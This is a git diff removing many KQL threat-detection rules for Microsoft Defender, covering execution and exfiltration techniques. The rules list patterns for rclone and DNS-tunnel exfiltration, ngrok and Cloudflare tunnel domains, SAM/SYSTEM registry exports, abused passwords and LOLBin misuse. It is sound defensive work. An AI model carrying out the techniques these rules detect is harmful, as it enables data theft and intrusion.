-| where (ProcessCommandLine contains "/node:" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "/node:127.0.0.1 " or ProcessCommandLine contains "/node:localhost ")))
\ No newline at end of file
diff --git a/Execution/WSL_Child_Process_Anomaly.kql b/Execution/WSL_Child_Process_Anomaly.kql
deleted file mode 100644
index 83b49b76..00000000
--- a/Execution/WSL_Child_Process_Anomaly.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/23
-// Level: medium
-// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\"))
\ No newline at end of file
diff --git a/Execution/WScript_or_CScript_Dropper_-_File.kql b/Execution/WScript_or_CScript_Dropper_-_File.kql
deleted file mode 100644
index 4bd91b3d..00000000
--- a/Execution/WScript_or_CScript_Dropper_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton
-// Date: 2022/01/10
-// Level: high
-// Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith ".jse" or FolderPath endswith ".vbe" or FolderPath endswith ".js" or FolderPath endswith ".vba" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Users\\" or FolderPath startswith "C:\\ProgramData")
\ No newline at end of file
diff --git a/Execution/Wab_Execution_From_Non_Default_Location.kql b/Execution/Wab_Execution_From_Non_Default_Location.kql
deleted file mode 100644
index 0ce9c87e..00000000
--- a/Execution/Wab_Execution_From_Non_Default_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: high
-// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\")))
\ No newline at end of file
diff --git a/Execution/Weak_or_Abused_Passwords_In_CLI.kql b/Execution/Weak_or_Abused_Passwords_In_CLI.kql
deleted file mode 100644
index 495f7484..00000000
--- a/Execution/Weak_or_Abused_Passwords_In_CLI.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/14
-// Level: medium
-// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
-An example would be a threat actor creating a new user via the net command and providing the password inline
-
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202"
\ No newline at end of file
diff --git a/Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql b/Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql
deleted file mode 100644
index 22255567..00000000
--- a/Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/11
-// Level: medium
-// Description: Detects the creation of binaries in the WinSxS folder by non-system processes
-// Tags: attack.execution
-DeviceFileEvents
-| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Systems32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index cc9098f3..00000000
--- a/Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/20 -// Level: medium -// Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where ProcessCommandLine contains " qfe" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/Execution/WmiPrvSE_Spawned_A_Process.kql b/Execution/WmiPrvSE_Spawned_A_Process.kql deleted file mode 100644 index 548475bc..00000000 --- a/Execution/WmiPrvSE_Spawned_A_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez @Cyb3rWard0g -// Date: 2019/08/15 -// Level: medium -// Description: Detects WmiPrvSE spawning a process -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\WmiPrvSe.exe" and (not(((LogonId in~ ("0x3e7", "null")) or isnull(LogonId) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe"))) \ No newline at end of file diff --git a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql b/Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql deleted file mode 100644 index 631d57e9..00000000 --- a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/12 -// Level: high -// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. -// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe" \ No newline at end of file diff --git a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql b/Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql deleted file mode 100644 index 60ed5e82..00000000 --- a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/12 -// Level: critical -// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. -// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002 -DeviceFileEvents -| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll" \ No newline at end of file diff --git a/Execution/Wscript_Shell_Run_In_CommandLine.kql b/Execution/Wscript_Shell_Run_In_CommandLine.kql deleted file mode 100644 index c0512515..00000000 --- a/Execution/Wscript_Shell_Run_In_CommandLine.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/31 -// Level: medium -// Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains "Wscript." and ProcessCommandLine contains ".Shell" and ProcessCommandLine contains ".Run" \ No newline at end of file diff --git a/Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql b/Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql deleted file mode 100644 index e16627c1..00000000 --- a/Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/11/26 -// Level: high -// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. - -// Tags: attack.execution -DeviceProcessEvents -| where FolderPath endswith "\\wusa.exe" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\Appdata\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\"))) \ No newline at end of file 
diff --git a/Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql b/Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql deleted file mode 100644 index c319c717..00000000 --- a/Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/05 -// Level: high -// Description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument from suspicious paths -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Appdata\\Local\\Temp\\") and (ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe") \ No newline at end of file diff --git a/Execution/Wusa_Extracting_Cab_Files.kql b/Execution/Wusa_Extracting_Cab_Files.kql deleted file mode 100644 index 13b35564..00000000 --- a/Execution/Wusa_Extracting_Cab_Files.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/04 -// Level: medium -// Description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument which is not longer supported. This could indicate an attacker using an old technique -// Tags: attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe" \ No newline at end of file diff --git a/Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql b/Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql deleted file mode 100644 index bd2befa9..00000000 --- a/Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql +++ /dev/null 
@@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/01 -// Level: medium -// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL - -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files"))) \ No newline at end of file diff --git a/Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql b/Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql deleted file mode 100644 index f4819e7d..00000000 --- a/Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/14 -// Level: medium -// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. -// Tags: attack.exfiltration, attack.discovery, attack.t1087.002 -DeviceProcessEvents -| where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i")) \ No newline at end of file diff --git a/Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql b/Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql deleted file mode 100644 index bb23104b..00000000 --- a/Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/14 -// Level: medium -// Description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. -// Tags: attack.exfiltration -DeviceProcessEvents -| where (ProcessCommandLine contains "-f" and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")) and (not(ProcessCommandLine contains " -i")) \ No newline at end of file diff --git a/Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql b/Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql deleted file mode 100644 index 35c6c056..00000000 --- a/Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2021/11/26 -// Level: medium -// Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender. -Users can configure different pilot collections for each of the co-management workloads. -It can be abused by attackers in order to upload or download files. - -// Tags: attack.exfiltration, attack.t1567 -DeviceProcessEvents -| where (ProcessCommandLine contains "ConfigSecurityPolicy.exe" or FolderPath endswith "\\ConfigSecurityPolicy.exe" or ProcessVersionInfoOriginalFileName =~ "ConfigSecurityPolicy.exe") and (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") \ No newline at end of file diff --git a/Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql b/Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql deleted file mode 100644 index 7585af33..00000000 --- a/Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql +++ /dev/null 
@@ -1,10 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/11/03 -// Level: high -// Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. -Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. -While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. - -// Tags: attack.exfiltration, attack.command_and_control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508 -DeviceNetworkEvents -| where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com" \ No newline at end of file diff --git a/Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql b/Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql deleted file mode 100644 index c32def88..00000000 --- a/Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3 -// Date: 2023/12/19 -// Level: low -// Description: Detects execution of "tar.exe" in order to create a compressed file. -Adversaries may abuse various utilities to compress or encrypt data before exfiltration. - -// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar") \ No newline at end of file 
diff --git a/Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql b/Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql deleted file mode 100644 index f02eb771..00000000 --- a/Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: AdmU3 -// Date: 2023/12/19 -// Level: low -// Description: Detects execution of "tar.exe" in order to extract compressed file. -Adversaries may abuse various utilities in order to decompress data to avoid detection. - -// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 -DeviceProcessEvents -| where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar") \ No newline at end of file diff --git a/Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql b/Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql deleted file mode 100644 index 2846d8ff..00000000 --- a/Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali -// Date: 2019/12/30 -// Level: medium -// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote -// Tags: attack.lateral_movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002 -DeviceProcessEvents -| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))))) \ No newline at end of file diff --git a/Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql b/Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql deleted file mode 100644 index 03a3a05c..00000000 --- a/Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2019/10/24 -// Level: high -// Description: Well-known DNS Exfiltration tools execution -// Tags: attack.exfiltration, attack.t1048.001, attack.command_and_control, attack.t1071.004, attack.t1132.001 -DeviceProcessEvents -| where FolderPath endswith "\\iodine.exe" or FolderPath contains "\\dnscat2" \ No newline at end of file diff --git a/Exfiltration/Email_Exifiltration_Via_Powershell.kql b/Exfiltration/Email_Exifiltration_Via_Powershell.kql deleted file mode 100644 index 1dbebea8..00000000 --- a/Exfiltration/Email_Exifiltration_Via_Powershell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea) -// Date: 2022/09/09 -// Level: high -// Description: Detects email exfiltration via powershell cmdlets -// Tags: attack.exfiltration -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-PSSnapin" and ProcessCommandLine contains "Get-Recipient" and ProcessCommandLine contains "-ExpandProperty" and ProcessCommandLine contains "EmailAddresses" and ProcessCommandLine contains "SmtpAddress" and ProcessCommandLine contains "-hidetableheaders") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql b/Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql deleted file mode 100644 index 4eea2e37..00000000 --- a/Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Oddvar Moe, Sander Wiebing, oscd.community -// Date: 2020/10/12 -// Level: high -// Description: Detects the export of a crital Registry key to a file. -// Tags: attack.exfiltration, attack.t1012 -DeviceProcessEvents -| where (ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E ") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE") \ No newline at end of file diff --git a/Exfiltration/Exports_Registry_Key_To_a_File.kql b/Exfiltration/Exports_Registry_Key_To_a_File.kql deleted file mode 100644 index 77d9247a..00000000 --- a/Exfiltration/Exports_Registry_Key_To_a_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Oddvar Moe, Sander Wiebing, oscd.community -// Date: 2020/10/07 -// Level: low -// Description: Detects the export of the target Registry key to a file. -// Tags: attack.exfiltration, attack.t1012 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E ") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security")))) \ No newline at end of file diff --git a/Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql b/Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql deleted file mode 100644 index ccb7d091..00000000 --- a/Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger -// Date: 2021/09/30 -// Level: medium -// Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe -// Tags: attack.exfiltration, attack.t1567 -DeviceProcessEvents -| where (ProcessCommandLine contains "/in:" or ProcessCommandLine contains "/out:" or ProcessCommandLine contains "/uri:") and (FolderPath endswith "\\DataSvcUtil.exe" or ProcessVersionInfoOriginalFileName =~ "DataSvcUtil.exe") \ No newline at end of file diff --git a/Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql b/Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql deleted file mode 100644 index a9c40d3a..00000000 --- a/Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2024/05/31 -// Level: medium -// Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors -// Tags: attack.t1041, attack.command_and_control, attack.t1090.002, attack.exfiltration -DeviceNetworkEvents -| where RemoteUrl endswith ".portmap.io" \ No newline at end of file diff --git a/Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql b/Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql deleted file mode 100644 index 1f2dad0d..00000000 --- a/Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql +++ /dev/null 
@@ -1,9 +0,0 @@ -// Author: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/05/27 -// Level: medium -// Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system. -Attackers can abuse that feature to establish a reverse shell or persistence on a machine. - -// Tags: attack.exfiltration, attack.command_and_control, attack.t1567.001 -DeviceNetworkEvents -| where RemoteUrl endswith ".v2.argotunnel.com" or RemoteUrl endswith "protocol-v2.argotunnel.com" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "update.argotunnel.com" \ No newline at end of file diff --git a/Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql b/Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql deleted file mode 100644 index 8e3e38f9..00000000 --- a/Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Kamran Saifullah -// Date: 2023/11/20 -// Level: medium -// Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. - -// Tags: attack.exfiltration, attack.t1567.001 -DeviceNetworkEvents -| where RemoteUrl endswith ".devtunnels.ms" \ No newline at end of file diff --git a/Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql b/Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql deleted file mode 100644 index 8b99a5d5..00000000 --- a/Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql +++ /dev/null 
@@ -1,9 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/12/06 -// Level: low -// Description: Detects a network connection initiated by a binary to "api.mega.co.nz". -Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads. - -// Tags: attack.exfiltration, attack.t1567.001 -DeviceNetworkEvents -| where RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" \ No newline at end of file diff --git a/Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql b/Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql deleted file mode 100644 index a6d547c3..00000000 --- a/Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Kamran Saifullah -// Date: 2023/11/20 -// Level: medium -// Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. - -// Tags: attack.exfiltration, attack.t1567.001 -DeviceNetworkEvents -| where RemoteUrl endswith ".tunnels.api.visualstudio.com" \ No newline at end of file diff --git a/Exfiltration/PUA_-_Rclone_Execution.kql b/Exfiltration/PUA_-_Rclone_Execution.kql deleted file mode 100644 index 187803ec..00000000 --- a/Exfiltration/PUA_-_Rclone_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group -// Date: 2021/05/10 -// Level: high -// Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc -// Tags: attack.exfiltration, attack.t1567.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "--config " and ProcessCommandLine contains "--no-check-certificate " and ProcessCommandLine contains " copy ") or ((ProcessCommandLine contains "pass" or ProcessCommandLine contains "user" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "sync" or ProcessCommandLine contains "config" or ProcessCommandLine contains "lsd" or ProcessCommandLine contains "remote" or ProcessCommandLine contains "ls" or ProcessCommandLine contains "mega" or ProcessCommandLine contains "pcloud" or ProcessCommandLine contains "ftp" or ProcessCommandLine contains "ignore-existing" or ProcessCommandLine contains "auto-confirm" or ProcessCommandLine contains "transfers" or ProcessCommandLine contains "multi-thread-streams" or ProcessCommandLine contains "no-check-certificate ") and (FolderPath endswith "\\rclone.exe" or ProcessVersionInfoFileDescription =~ "Rsync for cloud storage")) \ No newline at end of file diff --git a/Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql b/Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql deleted file mode 100644 index 68832173..00000000 --- a/Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql +++ /dev/null 
@@ -1,10 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/07/16 -// Level: high -// Description: Detects an executable initiating a network connection to "ngrok" domains. -Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. -While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. - -// Tags: attack.exfiltration, attack.t1567.001 -DeviceNetworkEvents -| where RemoteUrl endswith ".ngrok-free.app" or RemoteUrl endswith ".ngrok-free.dev" or RemoteUrl endswith ".ngrok.app" or RemoteUrl endswith ".ngrok.dev" or RemoteUrl endswith ".ngrok.io" \ No newline at end of file diff --git a/Exfiltration/Rclone_Config_File_Creation.kql b/Exfiltration/Rclone_Config_File_Creation.kql deleted file mode 100644 index 670716d1..00000000 --- a/Exfiltration/Rclone_Config_File_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Aaron Greetham 